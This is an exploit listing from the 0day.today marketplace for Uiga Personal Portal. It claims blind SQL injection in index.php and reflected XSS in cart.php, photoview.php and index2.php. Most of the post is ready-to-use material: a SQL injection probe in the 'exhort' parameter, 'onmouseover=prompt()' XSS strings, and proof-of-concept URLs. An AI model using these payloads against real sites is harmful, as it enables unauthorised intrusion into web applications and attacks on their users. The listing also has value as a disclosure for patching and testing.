[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Uiga Personal Portal Multiple Vulnerabilities

Author
Eyup CELIK
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-17011
Category
web applications
Date add
19-10-2011
Platform
php
# Exploit Title: Uiga Personal Portal Multiple Vulnerability
# Date: 2011
# Author: Eyup CELIK
# Version: All Version
# Tested on: All versions are Vulnerability
# Web Site: www.eyupcelik.com.tr
 
 
ISSUE
 
Blind SQL Injection and XSS can be done using the command input
 
Vulnerable Page:
index.php
cart.php
includes/photoview.php
index2.php
 
Example:
index.php?exhort=%24<Blind SQL Injection Code>&view=ar_det
cart.php/<XSS Code>
includes/photoview.php/<XSS Code>
index2.php/<XSS Code>
 
 
Exploit:
index.php?exhort=%2440-2+2*3-6&view=ar_det
cart.php/"onmouseover=prompt(955787)>
includes/photoview.php/"onmouseover=prompt(955787)>
index2.php/"onmouseover=prompt(955787)>
 
 
POC:
127.0.0.1/uigaportal/index.php?exhort=%2440-2+2*3-6&view=ar_det
127.0.0.1/uigaportal/cart.php/%22onmouseover=prompt(955787)%3E



#  0day.today [2024-11-14]  #